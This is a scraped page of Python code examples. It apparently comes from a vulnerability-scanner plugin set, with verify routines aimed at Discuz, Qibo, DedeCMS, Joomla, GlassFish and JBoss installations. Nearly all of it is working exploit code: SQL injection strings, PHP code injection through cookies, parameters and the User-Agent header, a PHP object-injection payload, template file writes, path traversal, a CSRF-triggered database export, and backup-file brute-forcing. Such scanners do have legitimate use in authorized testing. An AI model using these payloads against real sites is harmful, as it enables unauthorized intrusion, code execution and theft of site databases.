Esempio n. 1
0
    def _verify(self):
        result = Result(self)

        sig = '2c1743a391305fbf367df8e4f069f9f9'
        payload = {
            "formhash":
            "04949b0",
            "srchtxt":
            "aa",
            "srchtype":
            "threadsort",
            "st":
            "on",
            "sortid":
            "3",
            "selectsortid":
            "3 where tid=(select 1 from (select count(*),concat({0},floor(rand(0)*2))x from information_schema.tables group by x)a)#"
            .format(sig),
            "searchsubmit":
            "true"
        }

        url = self.urlJoin("/search.php")
        response = self.http.post(url, data=payload)

        if response.status_code == 200:
            if sig in response.content and "SQL" in response.content:
                result['fullpath'] = response.request.body
                result['payload'] = response.request.body

        return result
    def _verify(self):
        log = Log("exploit-discuz_brutefile")
        result = Result(self)

        dctype = self.args.get("type", "discuz").lower()
        if dctype not in ['discuz', 'discuzx']:
            dctype = "discuz"
        date = self.args.get("date", "15-01-01")
        days = self.args.get("days", "10")
        days = int(days)
        dirs = self.args.get("dirs", "1")
        dirs = int(dirs)

        url = self.baseURL if ".php" in self.url else self.url
        url = url.rstrip("/")
        alives = []
        for path in self.genPath(dctype, date, days, dirs):
            try:
                log.debug("request url {0}".format(url + path))
                response = self.http.get(url + path)
            except self.http.ConnectionError:
                pass

            if response.status_code == 200:
                log.debug("got alives {0}".format(url + path))
                alives.append(url + path)

        if alives:
            result['vulinfo'] = str(alives)

        return result
    def _info(self):
        result = Result(self)

        result['isvul'] = result.INFO
        result['elseinfo'] = u"访问以下链接,查看是否可以下载附件:{0}".format(
            self.genBypassLink())

        return result
Esempio n. 4
0
    def _verify(self):
        result = Result(self)

        phpPayload = "phpinfo();"
        sig = '_SERVER["HTTP_HOST"]'

        url = self.urlJoin("/inc/splitword.php")
        response = self.http.post(url, data={'Y2hlbmdzaGlzLmMjd': phpPayload})

        if response.status_code == 200:
            if sig in response.content:
                result['fullpath'] = self.url
                result['payload'] = phpPayload

        return result
Esempio n. 5
0
    def _verify(self):
        result = Result(self)

        php_code = '''echo "asdfgh123456";'''
        attack_payload = self._genPayload(php_code)

        response = self.http.get(self.url,
                                 headers={"User-Agent": attack_payload})

        if response.status_code == 200:
            response = self.http.get(self.url)
            if response.status_code == 200 and 'asdfgh123456' in response.content:
                result['fullpath'] = self.url
                result['payload'] = attack_payload

        return result
Esempio n. 6
0
    def _verify(self):
        result = Result(self)

        sig = '2c1743a391305fbf367df8e4f069f9f9'
        params = "?inc=edit_sort&act=modify&name[]=yyy"
        payload = {"table_album": "{0}".format(sig)}

        url = self.urlJoin("/blog/ajax.php")
        response = self.http.post(url + params, params=payload)

        if response.status_code == 200:
            if sig in response.content and "doesn't exist" in response.content:
                result['fullpath'] = url
                result['payload'] = response.request.url

        return result
    def _verify(self):
        result = Result(self)

        sig = '_SERVER["HTTP_HOST"]'
        cookie = "GLOBALS[_DCACHE][smilies][searcharray]=/.*/ei; GLOBALS[_DCACHE][smilies][replacearray]=phpinfo();"
        #cookie = "GLOBALS[_DCACHE][smilies][searcharray]=/.*/eiU; GLOBALS[_DCACHE][smilies][replacearray]=phpinfo();"
        headers = dict()
        headers['Cookie'] = cookie

        response = self.http.get(self.url, headers=headers)
        
        if response.status_code == 200:
            if sig in response.content:
                result['fullpath'] = self.url
                result['payload'] = 'Cookie: '+cookie

        return result
Esempio n. 8
0
    def _verify(self):
        result = Result(self)

        sig = u"才能浏览"
        userAgent = "Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)"
        #userAgent = "Mozilla/5.0 (compatible; Baiduspider/2.0; +http://**.**.**.**/search/spider.html)"
        headers = {'User-Agent':userAgent}

        response = self.http.get(self.url)
        response2 = self.http.get(self.url, headers=headers)

        if response2.status_code==200:
            if sig.encode("utf-8") in response.content and sig.encode("gbk")in response.content and  sig.encode("utf-8") not in response2.content and sig.encode("gbk") not in response2.content:
                result['fullpath'] = self.url
                result['payload'] = userAgent

        return result
    def _info(self):
        result = Result(self)

        url = self.urlJoin("admin.php")

        filename = "alpha"
        params = "?action=db&operation=export&setup=1&scrolltop=&anchor=&type=custom&customtables%5B%5D=pre_ucenter_admins&method=multivol&sizelimit=2048&extendins=0&sqlcompat=&usehex=1&usezip=0&filename={0}&exportsubmit=yes".format(
            filename)

        payload = "<img src='{0}'>".format(url + params)

        result['isvul'] = Result.INFO
        result['fullpath'] = url
        result[
            'elseinfo'] = u"发帖,嵌入图片{0},\n如果目标服务器为windows:\ndiscuzX访问/data/backup~1/{1}-1.sql,\ndiscuz访问/forumdata/backup~1/{1}-1.sql,\n目标服务器为linux则需要爆破backup_xxxxxx目录".format(
                payload, filename)

        return result
Esempio n. 10
0
    def _verify(self):
        result = Result(self)

        sig = '2c1743a391305fbf367df8e4f069f9f9'
        payload = "1' and 1=2 union all select 1,'{0}".format(sig)
        self.params['mod'] = "attachment"
        self.params['findpost'] = "ss"
        self.params['aid'] = base64.b64encode(payload)

        url = self.urlJoin("/forum.php")
        response = self.http.get(url, params=self.params)

        if response.status_code == 200:
            if sig in response.request.url:
                result['fullpath'] = url
                result['payload'] = payload

        return result
Esempio n. 11
0
    def _verify(self):
        result = Result(self)

        #php_code = '''echo "asdfgh123456";'''
        #attack_payload = self._genPayload(php_code)
        attack_payload = '''}__t|O:21:"JDatabaseDriverMysqli":2:{s:21:"\x5C0\x5C0\x5C0disconnectHandlers";a:1:{i:0;s:7:"print_r";}s:13:"\x5C0\x5C0\x5C0connection";i:1;}\xF0\x9D\x8C\x86'''
        attack_payload = '''}__t|O:21:"JDatabaseDriverMysqli":2:{s:21:"\\0\\0\\0disconnectHandlers";a:1:{i:0;s:7:"print_r";}s:13:"\\0\\0\\0connection";i:1;}\xF0\x9D\x8C\x86'''
        response = self.http.get(self.url,
                                 headers={"User-Agent": attack_payload})
        #time.sleep(10)

        if response.status_code == 200:
            response = self.http.get(self.url)
            print response.content
            if response.status_code == 200 and '*****@*****.**' in response.content:
                result['fullpath'] = self.url
                result['payload'] = attack_payload

        return result
    def _verify(self):
        result = Result(self)

        sig = '2c1743a391305fbf367df8e4f069f9f9'
        payload = "1 and select 1 from (select concat_ws(':', left(rand(), 3), {0}), count(*) from information_schema.tables group by 1)a;".format(
            sig)

        self.params['ac'] = 'view'
        self.params['shopid'] = payload

        url = self.urlJoin("/shop.php")
        response = self.http.get(url, params=self.params)

        if response.status_code == 200:
            if sig in response.content:
                result['fullpath'] = url
                result['payload'] = response.request.url

        return result
Esempio n. 13
0
    def _verify(self):
        result = Result(self)
        
        phpPayload = "@phpinfo()"
        params = "?label[a'.\"${%s}\".'][asd]=aaaa'" %phpPayload

        sig = '_SERVER["HTTP_HOST"]'

        url = self.urlJoin("/index.php")
        response = self.http.get(url+params)

        url2 = url.replace("index.php","cache/label_cache/index_~1.php")
        response2 = self.http.get(url2)

        if response2.status_code == 200:
            if sig in response2.content:
                result['fullpath'] = self.url
                result['payload'] = str(phpPayload)

        return result
    def _verify(self):
        result = Result(self)

        sig = '_SERVER["HTTP_HOST"]'
        payload = "<?php phpinfo();?>"
        params = "?inc=ol_module&step=2&step=2&moduleid=../../../../hack/template/admin&action=maketpl&Apower[template_list]=1&postdb[filepath]=template/blue.htm&postdb[code]={0}".format(
            payload)

        url = self.urlJoin("/blog/ajax.php")
        response = self.http.get(url + params)

        params2 = "?inc=edit_sort&job=../../../../template/blue"
        response2 = self.http.get(url + params2)

        if response2.status_code == 200:
            if sig in response2.content:
                result['fullpath'] = url
                result['payload'] = payload

        return result
Esempio n. 15
0
    def _verify(self):
        result = Result(self)

        sig = '9876541'
        params = "?inc=ol_module&step=2&moduleid=../../../../do/js&&id=514125&webdb[web_open]=1&webdb[cache_time_js]=-1"
        payload = {
            "pre":
            "qb_label where lid=-1 UNION SELECT 1,2,3,4,5,6,0,{0},9,10,11,12,13,14,15,16,17,18,19#"
            .format(sig)
        }

        url = self.urlJoin("/blog/ajax.php")
        response = self.http.get(url + params, params=payload)

        if response.status_code == 200:
            if sig in response.content:
                result['fullpath'] = url
                result['payload'] = response.request.url

        return result
    def _verify(self):
        result = Result(self)

        sig = '9876541'
        params = "?step=1"
        payload = {
            "type":
            "area where 1=(updatexml(1,concat(0x5e24,(select {0}),0x5e24),1))#"
            .format(sig)
        }

        url = self.urlJoin("/blog/member/update_sort.php")
        response = self.http.get(url + params, params=payload)

        if response.status_code == 200:
            if sig in response.content:
                result['fullpath'] = url
                result['payload'] = response.request.url

        return result
Esempio n. 17
0
    def _verify(self):
        result = Result(self)

        sig = u"远程获取失败"

        self.params['step'] = "11"
        self.params['insLockfile'] = "a"
        self.params['s_lang'] = "a"
        self.params['install_demo_name'] = "../data/admin/config_update.php"

        url = self.urlJoin("/install/index.php")
        response = self.http.get(url, params=self.params)

        if response.status_code == 200:
            if sig.encode('gbk') in response.content or sig.encode(
                    'utf-8') in response.content:
                result['fullpath'] = url
                result['payload'] = str(self.params)

        return result
Esempio n. 18
0
    def _verify(self):
        result = Result(self)

        paths = ["/theme/META-INF/%c0%ae%c0%ae/%c0%ae%c0%ae/__admingui/WEB-INF/web.xml",
            "/theme/META-INF/%c0.%c0./%c0.%c0./__admingui/WEB-INF/web.xml",
            "/theme/META-INF/%E0%80%AE%E0%80%AE/%E0%80%AE%E0%80%AE/__admingui/WEB-INF/web.xml"]

        signature = "<servlet-mapping>"
        matchs = []
        for path in paths:
            url = self.protocol + "://" + self.host + path

            response = self.http.get(url, allow_redirects=False)
            if response.status_code == 200:
                if signature in response.content:
                    matchs.append(url)

        if matchs:
            result['vulinfo'] = str(matchs)

        return result
    def _verify(self):
        result = Result(self)

        sig = '2c1743a391305fbf367df8e4f069f9f9'
        payload = {
            "gids[66]":
            "'",
            "gids[88][0]":
            ") and (select 1 from (select count(*),concat({0},floor(rand(0)*2))x from information_schema.tables group by x)a)#"
            .format(sig)
        }

        url = self.url if "faq.php" in self.url else self.baseURL + "/faq.php?action=grouppermission"
        response = self.http.post(url, data=payload)

        if response.status_code == 200:
            if sig in response.content and "SQL" in response.content:
                result['fullpath'] = url
                result['payload'] = "Post:" + response.request.body

        return result
Esempio n. 20
0
    def _verify(self):
        result = Result(self)

        vulpaths = {
            "jmx-console":
            "/jmx-console/HtmlAdaptor?action=inspectMBean&name=jboss.system:type=ServerInfo",
            "web-console": "/web-console/ServerInfo.jsp",
            "JMXInvokerServlet": "/invoker/JMXInvokerServlet",
            "admin-console": "/admin-console/"
        }

        matchs = Dict()
        for path in vulpaths:
            url = self.urlJoin(vulpaths[path])
            response = self.http.get(url, allow_redirects=False)
            if response.status_code == 200 or response.status_code == 500:
                matchs[path] = url

        if matchs:
            result['vulinfo'] = str(matchs)

        return result
    def _verify(self):
        log = Log("exploit_douphp_backupbrute")
        result = Result(self)

        sqlList = [
            'D20160~1.sql', 'D20150~1.sql', 'D20151~1.sql', 'D20140~1.sql',
            'D20141~1.sql', 'D20131~1.sql'
        ]

        vulURLs = []
        for sqlfile in sqlList:
            url = self.baseURL.rstrip("/") + "/data/backup/" + sqlfile

            log.debug("getting '{0}'".format(url))
            response = self.http.get(url, allow_redirects=False)

            if response.status_code == 200:
                log.debug("got alive'{0}'".format(url))
                vulURLs.append(url)

        if vulURLs:
            result['vulinfo'] = str(vulURLs)

        return result